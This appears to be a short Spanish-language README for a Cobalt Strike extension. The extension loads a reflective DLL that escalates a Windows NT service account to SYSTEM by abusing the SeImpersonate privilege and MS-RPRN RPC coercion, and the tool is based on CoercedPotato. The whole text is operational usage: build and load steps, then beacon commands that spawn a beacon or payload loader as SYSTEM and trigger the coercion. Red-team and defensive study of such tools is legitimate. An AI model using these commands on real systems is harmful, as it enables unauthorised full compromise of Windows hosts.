
DLL reflectante para escalar privilegios de NT Service a SYSTEM usando el privilegio SeImpersonateToken
Escalada de privilegios de servicio NT a SYSTEM utilizando el privilegio SeImpersonateToken y las funciones MS-RPRN.
Muy basado en https://github.com/Prepouce/CoercedPotato
Cargador reflectante de https://github.com/stephenfewer/ReflectiveDLLInjection.
Clona este repositorio y compila el proyecto en VisualStudio, luego carga dist/coercedpotato.cna en CobaltStrike.
Primero necesitas lanzar el listener RPC con
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
por ejemplo
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
luego puedes desencadenar una llamada SYSTEM
beacon> CoercedPotato coerce